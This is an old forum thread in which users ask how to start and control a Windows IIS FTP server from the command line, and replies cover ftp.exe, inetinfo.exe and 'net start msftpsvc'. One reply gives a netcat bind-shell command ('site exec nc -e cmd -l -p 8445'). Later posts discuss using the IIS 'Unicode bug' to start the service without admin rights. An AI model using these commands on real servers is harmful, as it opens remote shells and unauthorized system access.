Full Version: Control Windows Ftp Server (21) @ Cmd
anyone knows the executable in sys32 to control it?
??
what do u mean by " control " , a shell or what!? upload nc to the ftp server... then site exec nc -e cmd -l -p 8445 now just connect to port 8445 on ftp server ... thats it
The executable in system32 to control Windows FTP Server is a client named named ftp.exe
But I guess that's not what you meanth.... If you want to know what exe the MS FTP server runs as I must admit I don't know.... I thought it was part of IIS but not sure about that. Anyone?
you can control it via
Windows 2000 Instructions: Open Control Panel. Open Administrative Tools. Open Internet Services Manager. Expand the computer system with the Ftp server. Right Mouse Click on the "Default Ftp Site", or your Ftp server site if you have it named. but i have no idea how to control it via cmdline
as much as i remember IIS ftp server binary is inetinfo.exe
the same as IIS http server located in %systemroot%\system32\inetsrv am not 100% sure, will have to check when i get home
i know but you cant control it commandline
Yes That's My Question Too.
I've such a problem
i think it has a service name like the wwwserver .. , wanna know lots of info , if u have win2k or winxp professional install iis and run the ftp server and see what is running, second thing it doesnt have anything to do with ftp.exe thats a command line ftp client ..
@boshcash
The Problem is "How to Start the FTPServer" remotely by Command Prompt!
Just use google:
This is what you mean? net start msftpsvc Inetinfo.exe runs the ftp server.
Thank you very much
But Doesn't it need Admin prevellage ? I want to Do it By Unicode Bug for example! is it possible ?
You need admin priviledges to start a service, but as you suggested a unicode hack would work, due to the fact, that the service of IIS is running as System have phun
@ Double-=V=-
I tried it But it fails !
msftpsvc name is right see : http://www.microsoft.com/technet/treeview/...rg_arc_htfo.asp u can get the original service name here and put it between brackets , or if its not an english system , just try net start and see the services that u can run it ..
